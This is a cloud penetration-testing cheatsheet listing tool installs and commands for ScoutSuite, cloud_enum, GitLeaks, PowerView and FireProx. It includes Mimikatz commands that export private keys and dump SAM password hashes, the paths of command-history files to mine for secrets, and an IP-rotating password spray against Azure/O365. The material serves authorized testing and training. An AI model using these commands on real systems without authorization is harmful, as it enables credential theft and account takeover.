Other Useful Cloud Tools and Techniques Cheatsheet

By Beau Bullock (@dafthack)

ScoutSuite

Multi-cloud security auditing tool

https://github.com/nccgroup/ScoutSuite

Install ScoutSuite

sudo apt-get install virtualenv
git clone https://github.com/nccgroup/ScoutSuite
cd ScoutSuite
virtualenv -p python3 venv
source venv/bin/activate
pip install -r requirements.txt

To run as root

sudo apt-get install virtualenv
sudo su
virtualenv -p python3 venv
source venv/bin/activate
pip install scoutsuite

Scan AWS environment with ScoutSuite

python scout.py aws --profile=<aws profile name>

or if installed...

scout aws --profile=<aws profile name>

Cloud_Enum

Tool to search for public resources in AWS, Azure, and GCP

https://github.com/initstring/cloud_enum

python3 cloud_enum.py -k <name-to-search>

GitLeaks

Search repositories for secrets

https://github.com/zricethezav/gitleaks

Pull GitLeaks with Docker

sudo docker pull zricethezav/gitleaks

Print the help menu

sudo docker run --rm --name=gitleaks zricethezav/gitleaks --help

Use GitLeaks to search for secrets

sudo docker run --rm --name=gitleaks zricethezav/gitleaks -v -r <repo URL>

TruffleHog - https://github.com/dxa4481/truffleHog

Shhgit - https://github.com/eth0izzle/shhgit

Gitrob - https://github.com/michenriksen/gitrob

Mimikatz

Export Non-Exportable Private Keys From Web Server

mimikatz# crypto::capi
mimikatz# privilege::debug
mimikatz# crypto::cng
mimikatz# crypto::certificates /systemstore:local_machine /store:my /export

Dump password hashes from SAM/SYSTEM files

mimikatz# lsadump::sam /system:SYSTEM /sam:SAM

Check Command History

Linux Bash History Location

~/.bash_history

Windows PowerShell PSReadLine Location

%USERPROFILE%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

PowerView

https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon

Find on-prem ADConnect account name and server

Get-NetUser -Filter "(samAccountName=MSOL_*)" |Select-Object name,description | fl

FireProx

Password Spraying Azure/O365 while randomizing IPs with FireProx

Install

git clone https://github.com/ustayready/fireprox
cd fireprox
virtualenv -p python3 .
source bin/activate
pip install -r requirements.txt
python fire.py

Launch FireProx

python fire.py --access_key <access_key_id> --secret_access_key <secret_access_key> --region <region> --url https://login.microsoft.com --command create

Password spray using FireProx + MSOLSpray

Invoke-MSOLSpray -UserList .\userlist.txt -Password Spring2020 -URL https://api-gateway-endpoint-id.execute-api.us-east-1.amazonaws.com/fireprox

ip2Provider

Check a list of IP addresses against cloud provider IP space

https://github.com/oldrho/ip2provider

Vulnerable Infrastructure Creation

Cloudgoat - https://github.com/RhinoSecurityLabs/cloudgoat

SadCloud - https://github.com/nccgroup/sadcloud

Flaws Cloud - http://flaws.cloud

Thunder CTF - http://thunder-ctf.cloud